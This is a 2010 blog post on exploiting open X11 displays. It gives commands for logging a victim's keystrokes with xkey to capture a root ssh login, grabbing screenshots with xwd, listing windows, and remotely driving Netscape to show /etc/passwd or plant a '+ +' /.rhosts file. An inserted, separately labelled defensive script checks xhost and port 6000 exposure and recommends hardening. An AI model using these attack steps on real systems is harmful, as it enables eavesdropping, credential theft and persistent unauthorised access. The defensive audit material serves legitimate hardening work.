Thursday, August 5, 2010

X11 (6000 TCP)

X11 displays are (normally) protected at the network level - that is, there are no usernames and passwords involved. The display is actually a server and it listens on port 6000 (TCP). Which clients may connect to the server is controlled with the "xhost" command. By default it is set up so that nobody can connect to the display - default deny. As soon as programs need to share the display (exporting an xterm to your display from another host, or whatever) the user of the display has to add the IP number or DNS name of the client that wishes to connect by running the command "xhost +<host>". In theory this works perfectly well, but in the real world people tend to just enter "xhost +", which allows anyone to connect to the display.
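A defender-side check for the misconfiguration just described, as an added example that is not part of the original post. It classifies the display's access-control state from the text that xhost prints, looks for a TCP listener on port 6000 in ss or netstat output, and prints the fix; the sample strings are constructed to mimic those tools' output, and the live check runs only if the tools are installed.

```shell
#!/bin/sh
# Added example (not code from the original post): defender-side audit of an
# X display's exposure. It classifies the access-control state from the text
# that `xhost` prints, checks for a TCP listener on port 6000 (display :0) in
# ss/netstat output, and prints the remediation. The sample strings below are
# constructed to mimic those tools' output; the live check runs only if the
# tools are installed.

# xhost_state "<xhost output>" -> prints open | restricted | unknown
xhost_state() {
    case "$1" in
        *"access control disabled"*) echo open ;;
        *"access control enabled"*)  echo restricted ;;
        *)                           echo unknown ;;
    esac
}

# tcp6000_listening "<ss or netstat output>" -> exit 0 if something listens
# on TCP 6000 on any address (IPv4, IPv6 or '*'), exit 1 otherwise
tcp6000_listening() {
    printf '%s\n' "$1" | grep -Eq '(LISTEN.*[:.]6000[[:space:]])|([:.]6000[[:space:]].*LISTEN)'
}

# recommend <state> <listening: 0=yes 1=no> -> one-line hardening advice
recommend() {
    if [ "$2" -eq 0 ] && [ "$1" = open ]; then
        echo "EXPOSED: run 'xhost -' now and start X with -nolisten tcp"
    elif [ "$2" -eq 0 ]; then
        echo "reachable: X listens on TCP; prefer -nolisten tcp plus ssh -X"
    else
        echo "ok: no TCP listener, remote clients cannot reach the display"
    fi
}

# Constructed samples: the two standard xhost messages and one ss listener line
SAMPLE_OPEN='access control disabled, clients can connect from any host'
SAMPLE_CLOSED='access control enabled, only authorized clients can connect'
SAMPLE_SS='LISTEN 0 128 0.0.0.0:6000 0.0.0.0:*'

if tcp6000_listening "$SAMPLE_SS"; then l=0; else l=1; fi
echo "sample (xhost +): $(recommend "$(xhost_state "$SAMPLE_OPEN")" "$l")"
echo "sample (xhost -): $(recommend "$(xhost_state "$SAMPLE_CLOSED")" "$l")"

# Live audit of this host (needs xhost for the display and ss for sockets)
if command -v xhost >/dev/null 2>&1 && command -v ss >/dev/null 2>&1; then
    if tcp6000_listening "$(ss -ltn 2>/dev/null)"; then l=0; else l=1; fi
    echo "live: $(recommend "$(xhost_state "$(xhost 2>/dev/null)")" "$l")"
fi
```

Note that "xhost -" only re-enables access control; any hosts already added with "xhost +<host>" stay authorised until removed, and only -nolisten tcp stops remote connections altogether.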

A host whose display is open for anyone to connect to is risking a lot, and could well be compromised. There are a few things to do when you find an open X11 display. One of the most common attacks is to capture all the keystrokes that are entered on the victim's host. The program "xkey" (available from www.hack.co.za) does this very neatly:

xkey 196.37.xxx.14:0.0
..you wait..time passes..and then:
ssh -l root -<>P 196.37.xxx.1

weirdshitometer
It's clear why we are excited about key captures. An open X11 display can also be "copied" - the root window (the main window) can be copied and displayed. Each window has a unique ID - you can specify which window you want to copy, but for a start let us get the root window:

xwd -display 196.37.xxx.14 -root -silent -out /tmp/screendump
..wait for the transfer...
xv /tmp/screendump

We are using xv to display the screen - xv can read the xwd format straight off. The screen might include some interesting data - if you get a screensaver, bad luck - use finger to see when someone is active. To get a list of the windows that are open on the display you might want to issue the command:
xwininfo -display -all -root | grep \"
(extract)
0x3000e6f "Netscape: Find": ("findDialog_popup" "Netscape") 378x144+536+227 +536+227
0x1c0000c "FvwmButtons": ("FvwmButtons" "FvwmButtons") 385x68+0+0 +635+4
0x2400005 "xload": ("xload" "XLoad") 106x52+2+2 +637+6
0x2000002 "Desktop": ("FvwmPager" "FvwmModule") 105x64+277+2 +912+6
0x30001ec "Netscape": ("communicator-4_72_bin" "Netscape") 1x1+0+0 +0+0
0x3000172 "Communicator Bookmarks for Roelof Temmingh": ("bookmarks" "Netscape") 872x622+10+10 +10+10
0x300001c " ": ("mozillaComponentBar" "Netscape") 5x5+50+50 +50+50
0x3000001 "Netscape": ("communicator-4.72.bin" "Netscape") 1x1+0+0 +0+0
If the victim is using more than one virtual screen you will be able to see the other screen listed (you won't see it with xwd). With a bit of luck you get a Netscape browser open. Finding Netscape open on an open X11 display is very good news, as you can remotely control Netscape. Fancy telling Netscape to open /etc/passwd and doing another screen capture? Here is how:
netscape -display -remote 'openFile(/etc/passwd)'
xwd -display -root -silent -out /tmp/netscape
xv /tmp/netscape

You can even tell Netscape to write files. Trying to overwrite existing files won't work - you will get a nasty Netscape popup - but you can write files that do not exist yet. You could create a page with "+ +" on it, redirect the browser to that page and, if Netscape is running as root, save it to /.rhosts. Be sure to have a close look at http://home.netscape.com/newsref/std/x-remote.html if you find an open X11 display running Netscape.

In theory you could also send keystrokes to an open X display. I found the program "xpusher.c" at , fiddled around with it, but it does not seem to work. There might be other programs around.
